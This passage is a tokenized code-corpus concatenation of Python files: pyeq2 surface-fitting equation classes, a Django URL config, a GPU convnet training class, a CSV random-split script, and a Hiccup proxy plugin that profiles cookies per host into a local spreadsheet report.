power ( c * y_in + d , <NUM_LIT> ) - b * ( c * y_in + d ) * numpy . square ( f * x_in + g ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class Paraboloid ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . XSQPLUSYSQ ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> XSQPLUSYSQ = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> try : <EOL> temp = a * XSQPLUSYSQ <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . 
ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class Paraboloid_Transform ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:d>' , '<STR_LIT:f>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . Y ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> y_in = inDataCacheDictionary [ '<STR_LIT:Y>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> c = inCoeffs [ <NUM_LIT:2> ] <EOL> d = inCoeffs [ <NUM_LIT:3> ] <EOL> f = inCoeffs [ <NUM_LIT:4> ] <EOL> try : <EOL> temp = a * ( numpy . square ( b * x_in + c ) + numpy . square ( d * y_in + f ) ) <EOL> return self . extendedVersionHandler . 
GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class PaschensBreakdownFieldStrengthLaw ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = True <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = True <EOL> independentData2CannotContainZeroFlag = True <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = True <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . LogXY ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> LogXY = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = x_in * ( a / ( LogXY + b ) ) <EOL> return self . extendedVersionHandler . 
GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class PaschensBreakdownVoltageLaw ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT>' <EOL> _coefficientDesignators = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = True <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = True <EOL> independentData2CannotContainZeroFlag = True <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = True <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . XY ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . LogXY ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> XY = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> LogXY = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> a = inCoeffs [ <NUM_LIT:0> ] <EOL> b = inCoeffs [ <NUM_LIT:1> ] <EOL> try : <EOL> temp = ( a * XY ) / ( LogXY + b ) <EOL> return self . extendedVersionHandler . 
GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s </s>
<s> from __future__ import print_function <EOL> from __future__ import unicode_literals <EOL> from __future__ import absolute_import <EOL> asciiDataInFourColumns_small = '''<STR_LIT>''' <EOL> asciiIntegerDataInColumns = '''<STR_LIT>''' <EOL> asciiDataInFourColumns = '''<STR_LIT>''' <EOL> asciiDataInColumns_2D = '''<STR_LIT>''' <EOL> asciiDataInColumns_3D = '''<STR_LIT>''' <EOL> asciiDataInColumns_2D_small = '''<STR_LIT>''' <EOL> asciiDataInColumns_3D_small = '''<STR_LIT>''' <EOL> asciiDataForExponentialSensitivityTest = '''<STR_LIT>''' </s>
<s> from django . conf . urls import patterns , url <EOL> from django . views . generic . base import TemplateView <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , TemplateView . as_view ( template_name = "<STR_LIT>" ) ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> import numpy as n <EOL> import os <EOL> from time import time , asctime , localtime , strftime <EOL> from numpy . random import randn , rand <EOL> from numpy import s_ , dot , tile , zeros , ones , zeros_like , array , ones_like <EOL> from util import * <EOL> from data import * <EOL> from options import * <EOL> from math import ceil , floor , sqrt <EOL> from data import DataProvider , dp_types <EOL> import sys <EOL> import shutil <EOL> import platform <EOL> from os import linesep as NL <EOL> class ModelStateException ( Exception ) : <EOL> pass <EOL> class IGPUModel : <EOL> def __init__ ( self , model_name , op , load_dic , filename_options = None , dp_params = { } ) : <EOL> self . model_name = model_name <EOL> self . op = op <EOL> self . options = op . options <EOL> self . load_dic = load_dic <EOL> self . filename_options = filename_options <EOL> self . dp_params = dp_params <EOL> self . get_gpus ( ) <EOL> self . fill_excused_options ( ) <EOL> self . img_size = <NUM_LIT:32> <EOL> self . img_channels = <NUM_LIT:3> <EOL> self . img_rs = <NUM_LIT:0> <EOL> for o in op . get_options_list ( ) : <EOL> setattr ( self , o . name , o . value ) <EOL> if load_dic : <EOL> self . model_state = load_dic [ "<STR_LIT>" ] <EOL> self . save_file = self . options [ "<STR_LIT>" ] . value <EOL> if not os . path . isdir ( self . save_file ) : <EOL> self . save_file = os . path . dirname ( self . save_file ) <EOL> ( pdir , self . save_file ) = os . path . split ( self . save_file ) <EOL> if ( len ( self . save_file ) == <NUM_LIT:0> ) : <EOL> ( pdir , self . save_file ) = os . path . split ( pdir ) <EOL> if ( os . path . samefile ( pdir , self . save_path ) ) : <EOL> print "<STR_LIT>" , pdir <EOL> print "<STR_LIT>" , self . save_path <EOL> else : <EOL> self . model_state = { } <EOL> if self . model_file : <EOL> self . save_file = self . model_file <EOL> else : <EOL> if filename_options is not None : <EOL> self . save_file = model_name + "<STR_LIT:_>" + '<STR_LIT:_>' . 
join ( [ '<STR_LIT>' % ( char , self . options [ opt ] . get_str_value ( ) ) for opt , char in filename_options ] ) + '<STR_LIT:_>' + strftime ( '<STR_LIT>' ) <EOL> self . model_state [ "<STR_LIT>" ] = [ ] <EOL> self . model_state [ "<STR_LIT>" ] = [ ] <EOL> self . model_state [ "<STR_LIT>" ] = <NUM_LIT:1> <EOL> self . model_state [ "<STR_LIT>" ] = self . train_batch_range [ <NUM_LIT:0> ] <EOL> self . init_data_providers ( ) <EOL> if load_dic : <EOL> self . train_data_provider . advance_batch ( ) <EOL> try : <EOL> self . init_model_state ( ) <EOL> except ModelStateException , e : <EOL> print e <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> for var , val in self . model_state . iteritems ( ) : <EOL> setattr ( self , var , val ) <EOL> self . import_model ( ) <EOL> self . init_model_lib ( ) <EOL> def import_model ( self ) : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" % ( '<STR_LIT:_>' + self . model_name ) <EOL> self . libmodel = __import__ ( '<STR_LIT:_>' + self . model_name ) <EOL> def fill_excused_options ( self ) : <EOL> pass <EOL> def init_data_providers ( self ) : <EOL> self . dp_params [ '<STR_LIT>' ] = self <EOL> try : <EOL> self . test_data_provider = DataProvider . get_instance ( <EOL> self . data_path , <EOL> self . img_size , self . img_channels , <EOL> self . test_batch_range , <EOL> type = self . dp_type , dp_params = self . dp_params , test = True ) <EOL> self . train_data_provider = DataProvider . get_instance ( <EOL> self . data_path , <EOL> self . img_size , self . img_channels , <EOL> self . train_batch_range , <EOL> self . model_state [ "<STR_LIT>" ] , self . model_state [ "<STR_LIT>" ] , <EOL> type = self . dp_type , dp_params = self . dp_params , test = False ) <EOL> except DataProviderException , e : <EOL> print "<STR_LIT>" % e <EOL> self . print_data_providers ( ) <EOL> sys . exit ( ) <EOL> def init_model_state ( self ) : <EOL> pass <EOL> def init_model_lib ( self ) : <EOL> pass <EOL> def start ( self ) : <EOL> if self . test_only : <EOL> self . 
test_outputs += [ self . get_test_error ( ) ] <EOL> self . print_test_results ( ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> self . train ( ) <EOL> def scale_learningRate ( self , eps ) : <EOL> self . libmodel . scaleModelEps ( eps ) ; <EOL> def reset_modelMom ( self ) : <EOL> self . libmodel . resetModelMom ( ) ; <EOL> def train ( self ) : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" , self . scale_rate <EOL> print "<STR_LIT>" , self . reset_mom <EOL> print "<STR_LIT>" , self . img_rs <EOL> print "<STR_LIT>" <EOL> self . scale_learningRate ( self . scale_rate ) <EOL> if self . reset_mom : <EOL> self . reset_modelMom ( ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" % self . model_name <EOL> self . op . print_values ( ) <EOL> print "<STR_LIT>" <EOL> self . print_model_state ( ) <EOL> print "<STR_LIT>" % "<STR_LIT:U+002CU+0020>" . join ( "<STR_LIT>" % d for d in self . device_ids ) <EOL> print "<STR_LIT>" % asctime ( localtime ( ) ) <EOL> print "<STR_LIT>" % os . path . join ( self . save_path , self . save_file ) <EOL> print "<STR_LIT>" <EOL> next_data = self . get_next_batch ( ) <EOL> if self . adp_drop : <EOL> dropRate = <NUM_LIT:0.0> <EOL> self . set_dropRate ( dropRate ) ; <EOL> epoch_cost = <NUM_LIT:0> <EOL> print_epoch_cost = False <EOL> while self . epoch <= self . num_epochs : <EOL> data = next_data <EOL> self . epoch , self . batchnum = data [ <NUM_LIT:0> ] , data [ <NUM_LIT:1> ] <EOL> if self . batchnum == <NUM_LIT:1> : <EOL> if print_epoch_cost : <EOL> print "<STR_LIT>" + str ( epoch_cost ) <EOL> epoch_cost = <NUM_LIT:0> <EOL> print_epoch_cost = True <EOL> self . print_iteration ( ) <EOL> sys . stdout . flush ( ) <EOL> if self . batchnum == <NUM_LIT:1> and self . adp_drop : <EOL> dropRate = self . adjust_dropRate ( dropRate ) <EOL> compute_time_py = time ( ) <EOL> self . start_batch ( data ) <EOL> next_data = self . get_next_batch ( ) <EOL> batch_output = self . finish_batch ( ) <EOL> self . train_outputs += [ batch_output ] <EOL> epoch_cost += self . 
print_train_results ( ) <EOL> if self . get_num_batches_done ( ) % self . testing_freq == <NUM_LIT:0> : <EOL> self . sync_with_host ( ) <EOL> self . test_outputs += [ self . get_test_error ( ) ] <EOL> self . print_test_results ( ) <EOL> self . print_test_status ( ) <EOL> self . conditional_save ( ) <EOL> self . print_train_time ( time ( ) - compute_time_py ) <EOL> self . cleanup ( ) <EOL> def cleanup ( self ) : <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> def set_dropRate ( self , dropRate ) : <EOL> print "<STR_LIT>" , dropRate <EOL> self . libmodel . setDropRate ( dropRate ) ; <EOL> def adjust_dropRate ( self , dropRate ) : <EOL> if not self . train_outputs : <EOL> return dropRate <EOL> costs , num_cases = self . train_outputs [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] , self . train_outputs [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> for errname in costs . keys ( ) : <EOL> if costs [ errname ] [ <NUM_LIT:1> ] < ( <NUM_LIT:1> - dropRate ) : <EOL> dropRate += <NUM_LIT:0.1> <EOL> self . set_dropRate ( dropRate ) <EOL> return dropRate <EOL> def sync_with_host ( self ) : <EOL> self . libmodel . syncWithHost ( ) <EOL> def print_model_state ( self ) : <EOL> pass <EOL> def get_num_batches_done ( self ) : <EOL> return len ( self . train_batch_range ) * ( self . epoch - <NUM_LIT:1> ) + self . batchnum - self . train_batch_range [ <NUM_LIT:0> ] + <NUM_LIT:1> <EOL> def get_next_batch ( self , train = True ) : <EOL> dp = self . train_data_provider <EOL> if not train : <EOL> dp = self . test_data_provider <EOL> data = self . parse_batch_data ( dp . get_next_batch ( ) , train = train ) <EOL> w = dp . get_out_img_size ( ) <EOL> h = dp . get_out_img_size ( ) <EOL> d = dp . get_out_img_depth ( ) <EOL> if self . img_rs and train : <EOL> assert ( w * h * d == data [ <NUM_LIT:2> ] [ <NUM_LIT:0> ] . shape [ <NUM_LIT:0> ] ) <EOL> self . libmodel . 
preprocess ( [ data [ <NUM_LIT:2> ] [ <NUM_LIT:0> ] ] , w , h , d , <NUM_LIT> , <NUM_LIT:15> ) <EOL> return data <EOL> def parse_batch_data ( self , batch_data , train = True ) : <EOL> return batch_data [ <NUM_LIT:0> ] , batch_data [ <NUM_LIT:1> ] , batch_data [ <NUM_LIT:2> ] [ '<STR_LIT:data>' ] <EOL> def start_batch ( self , batch_data , train = True ) : <EOL> self . libmodel . startBatch ( batch_data [ <NUM_LIT:2> ] , not train ) <EOL> def finish_batch ( self ) : <EOL> return self . libmodel . finishBatch ( ) <EOL> def print_iteration ( self ) : <EOL> print "<STR_LIT>" % ( self . epoch , self . batchnum ) , <EOL> def print_train_time ( self , compute_time_py ) : <EOL> print "<STR_LIT>" % ( compute_time_py ) <EOL> def print_train_results ( self ) : <EOL> batch_error = self . train_outputs [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> if not ( batch_error > <NUM_LIT:0> and batch_error < <NUM_LIT> ) : <EOL> print "<STR_LIT>" % batch_error <EOL> self . cleanup ( ) <EOL> print "<STR_LIT>" % ( batch_error ) , <EOL> def print_test_results ( self ) : <EOL> batch_error = self . test_outputs [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> print "<STR_LIT>" % ( NL , batch_error ) , <EOL> def print_test_status ( self ) : <EOL> status = ( len ( self . test_outputs ) == <NUM_LIT:1> or self . test_outputs [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] < self . test_outputs [ - <NUM_LIT:2> ] [ <NUM_LIT:0> ] ) and "<STR_LIT>" or "<STR_LIT>" <EOL> print status , <EOL> def conditional_save ( self ) : <EOL> batch_error = self . test_outputs [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> if batch_error > <NUM_LIT:0> and batch_error < self . max_test_err : <EOL> self . save_state ( ) <EOL> else : <EOL> print "<STR_LIT>" % self . max_test_err , <EOL> def aggregate_test_outputs ( self , test_outputs ) : <EOL> test_error = tuple ( [ sum ( t [ r ] for t in test_outputs ) / ( <NUM_LIT:1> if self . test_one else len ( self . 
test_batch_range ) ) for r in range ( len ( test_outputs [ - <NUM_LIT:1> ] ) ) ] ) <EOL> return test_error <EOL> def get_test_error ( self ) : <EOL> next_data = self . get_next_batch ( train = False ) <EOL> test_outputs = [ ] <EOL> while True : <EOL> data = next_data <EOL> self . start_batch ( data , train = False ) <EOL> load_next = not self . test_one and data [ <NUM_LIT:1> ] < self . test_batch_range [ - <NUM_LIT:1> ] <EOL> if load_next : <EOL> next_data = self . get_next_batch ( train = False ) <EOL> test_outputs += [ self . finish_batch ( ) ] <EOL> if self . test_only : <EOL> print "<STR_LIT>" % ( data [ <NUM_LIT:1> ] , str ( test_outputs [ - <NUM_LIT:1> ] ) ) <EOL> if not load_next : <EOL> break <EOL> sys . stdout . flush ( ) <EOL> return self . aggregate_test_outputs ( test_outputs ) <EOL> def set_var ( self , var_name , var_val ) : <EOL> setattr ( self , var_name , var_val ) <EOL> self . model_state [ var_name ] = var_val <EOL> return var_val <EOL> def get_var ( self , var_name ) : <EOL> return self . model_state [ var_name ] <EOL> def has_var ( self , var_name ) : <EOL> return var_name in self . model_state <EOL> def save_state ( self ) : <EOL> for att in self . model_state : <EOL> if hasattr ( self , att ) : <EOL> self . model_state [ att ] = getattr ( self , att ) <EOL> dic = { "<STR_LIT>" : self . model_state , <EOL> "<STR_LIT>" : self . op } <EOL> checkpoint_dir = os . path . join ( self . save_path , self . save_file ) <EOL> checkpoint_file = "<STR_LIT>" % ( self . epoch , self . batchnum ) <EOL> checkpoint_file_full_path = os . path . join ( checkpoint_dir , checkpoint_file ) <EOL> if not os . path . exists ( checkpoint_dir ) : <EOL> os . makedirs ( checkpoint_dir ) <EOL> pickle ( checkpoint_file_full_path , dic , compress = self . zip_save ) <EOL> for f in sorted ( os . listdir ( checkpoint_dir ) , key = alphanum_key ) : <EOL> if sum ( os . path . getsize ( os . path . join ( checkpoint_dir , f2 ) ) for f2 in os . 
listdir ( checkpoint_dir ) ) > self . max_filesize_mb * <NUM_LIT> * <NUM_LIT> and f != checkpoint_file : <EOL> os . remove ( os . path . join ( checkpoint_dir , f ) ) <EOL> else : <EOL> break <EOL> @ staticmethod <EOL> def load_checkpoint ( load_dir ) : <EOL> if os . path . isdir ( load_dir ) : <EOL> return unpickle ( os . path . join ( load_dir , sorted ( os . listdir ( load_dir ) , key = alphanum_key ) [ - <NUM_LIT:1> ] ) ) <EOL> return unpickle ( load_dir ) <EOL> @ staticmethod <EOL> def get_options_parser ( ) : <EOL> op = OptionsParser ( ) <EOL> op . add_option ( "<STR_LIT:f>" , "<STR_LIT>" , StringOptionParser , "<STR_LIT>" , default = "<STR_LIT>" , excuses = OptionsParser . EXCLUDE_ALL ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , RangeOptionParser , "<STR_LIT>" ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , RangeOptionParser , "<STR_LIT>" ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , StringOptionParser , "<STR_LIT>" , default = "<STR_LIT:default>" ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , IntegerOptionParser , "<STR_LIT>" , default = <NUM_LIT> ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , IntegerOptionParser , "<STR_LIT>" , default = <NUM_LIT> ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , StringOptionParser , "<STR_LIT>" ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , StringOptionParser , "<STR_LIT>" ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , IntegerOptionParser , "<STR_LIT>" , default = <NUM_LIT> ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , FloatOptionParser , "<STR_LIT>" ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , IntegerOptionParser , "<STR_LIT>" , default = <NUM_LIT:1> ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , BooleanOptionParser , "<STR_LIT>" , default = <NUM_LIT:0> ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , BooleanOptionParser , "<STR_LIT>" , default = <NUM_LIT:0> ) <EOL> op . 
add_option ( "<STR_LIT>" , "<STR_LIT>" , BooleanOptionParser , "<STR_LIT>" , default = <NUM_LIT:1> ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , ListOptionParser ( IntegerOptionParser ) , "<STR_LIT>" , default = OptionExpression ( "<STR_LIT>" ) ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , FloatOptionParser , "<STR_LIT>" , default = <NUM_LIT:1> ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , BooleanOptionParser , "<STR_LIT>" , default = False ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , StringOptionParser , "<STR_LIT>" , default = "<STR_LIT>" ) <EOL> op . add_option ( "<STR_LIT>" , "<STR_LIT>" , BooleanOptionParser , "<STR_LIT>" , <EOL> default = False ) <EOL> return op <EOL> @ staticmethod <EOL> def print_data_providers ( ) : <EOL> print "<STR_LIT>" <EOL> for dp , desc in dp_types . iteritems ( ) : <EOL> print "<STR_LIT>" % ( dp , desc ) <EOL> def get_gpus ( self ) : <EOL> self . device_ids = [ get_gpu_lock ( g ) for g in self . op . get_value ( '<STR_LIT>' ) ] <EOL> if GPU_LOCK_NO_LOCK in self . device_ids : <EOL> print "<STR_LIT>" <EOL> sys . exit ( ) <EOL> @ staticmethod <EOL> def parse_options ( op ) : <EOL> try : <EOL> load_dic = None <EOL> options = op . parse ( ) <EOL> if options [ "<STR_LIT>" ] . value_given : <EOL> load_dic = IGPUModel . load_checkpoint ( options [ "<STR_LIT>" ] . value ) <EOL> old_op = load_dic [ "<STR_LIT>" ] <EOL> old_op . merge_from ( op ) <EOL> op = old_op <EOL> op . eval_expr_defaults ( ) <EOL> return op , load_dic <EOL> except OptionMissingException , e : <EOL> print e <EOL> op . print_usage ( ) <EOL> except OptionException , e : <EOL> print e <EOL> except UnpickleError , e : <EOL> print "<STR_LIT>" <EOL> print e <EOL> sys . exit ( ) </s>
<s> '''<STR_LIT>''' <EOL> import csv <EOL> import sys <EOL> import random <EOL> input_file = sys . argv [ <NUM_LIT:1> ] <EOL> output_file1 = sys . argv [ <NUM_LIT:2> ] <EOL> output_file2 = sys . argv [ <NUM_LIT:3> ] <EOL> try : <EOL> P = float ( sys . argv [ <NUM_LIT:4> ] ) <EOL> except IndexError : <EOL> P = <NUM_LIT> <EOL> try : <EOL> seed = sys . argv [ <NUM_LIT:5> ] <EOL> except IndexError : <EOL> seed = None <EOL> try : <EOL> skip_headers = sys . argv [ <NUM_LIT:6> ] <EOL> except IndexError : <EOL> skip_headers = False <EOL> try : <EOL> skip_headers = sys . argv [ <NUM_LIT:6> ] <EOL> except IndexError : <EOL> skip_headers = False <EOL> print "<STR_LIT>" % ( P ) <EOL> if seed : <EOL> random . seed ( seed ) <EOL> i = open ( input_file ) <EOL> o1 = open ( output_file1 , '<STR_LIT:wb>' ) <EOL> o2 = open ( output_file2 , '<STR_LIT:wb>' ) <EOL> if skip_headers : <EOL> i . readline ( ) <EOL> counter = <NUM_LIT:0> <EOL> for line in i : <EOL> r = random . random ( ) <EOL> if r > P : <EOL> o2 . write ( line ) <EOL> else : <EOL> o1 . write ( line ) <EOL> counter += <NUM_LIT:1> <EOL> if counter % <NUM_LIT> == <NUM_LIT:0> : <EOL> print counter </s>
from hiccup import BasePlugin
from hiccup import SharedFunctions as shared
from synchronize import *
import re

class CookieProfiler(BasePlugin.BasePlugin):
    """Hiccup plugin that collects cookie names/values per host and
    periodically dumps the accumulated profile to an XLSX report.

    NOTE(review): exact cookie-header regex and config key names are
    placeholder literals here; semantics inferred from structure.
    """
    # Config keys this plugin requires (validated by the base class).
    required_config = ['<STR_LIT>', '<STR_LIT>']
    plugin_scope = '<STR_LIT>'
    # Pattern matched line-by-line against message headers; expected to
    # expose a named group containing the raw cookie string.
    str_cookies = '<STR_LIT>'
    re_cookies = re.compile(str_cookies)
    # Column layout for the XLSX report: (column id, title, width).
    results_columns = [('<STR_LIT:A>', '<STR_LIT>', <NUM_LIT:50>), ('<STR_LIT:B>', '<STR_LIT>', <NUM_LIT:30>), ('<STR_LIT:C>', '<STR_LIT>', <NUM_LIT:50>)]

    def __init__(self, global_config):
        BasePlugin.BasePlugin.__init__(self, global_config, self.required_config, self.plugin_scope)
        self.output_file = global_config[self.plugin_name]['<STR_LIT>']
        # Flush the profile to disk every `write_after` processed messages.
        self.write_after = global_config[self.plugin_name]['<STR_LIT>']
        # host -> {cookie name -> set of observed values}
        self.cookiejar = {}
        self.count = <NUM_LIT:0>

    def process_request(self, message):
        # Requests and responses are profiled identically.
        self.process_message(message)

    def process_response(self, message):
        self.process_message(message)

    @make_synchronized
    def update_results(self, codata):
        """Serialize the cookie jar to the XLSX output file.

        Synchronized because profiling may run from multiple threads
        (decorator from the `synchronize` module).
        """
        data = []
        for host in sorted(codata):
            for key in sorted(codata[host]):
                # One row per (host, cookie name), values joined into one cell.
                data.append([host, key, '<STR_LIT:U+002C>'.join(sorted(codata[host][key]))])
        shared.write_xlsx(self.output_file, '<STR_LIT>', self.results_columns, data)
        self.logger.info("<STR_LIT>" % (self.count, self.output_file))

    def process_message(self, message):
        """Extract cookies from one message and fold them into the jar."""
        self.count = self.count + <NUM_LIT:1>
        # Write BEFORE processing the current message, i.e. the report
        # covers the previous `write_after` messages.
        if (self.count % self.write_after == <NUM_LIT:0>):
            self.update_results(self.cookiejar)
        for line in message['<STR_LIT>'].splitlines():
            res = self.re_cookies.match(line)
            if (res):
                if (message['<STR_LIT>'] not in self.cookiejar):
                    self.cookiejar[message['<STR_LIT>']] = {}
                # Split "k1=v1; k2=v2; flag" into (key, value) pairs;
                # a bare token with no '=' yields key == val.
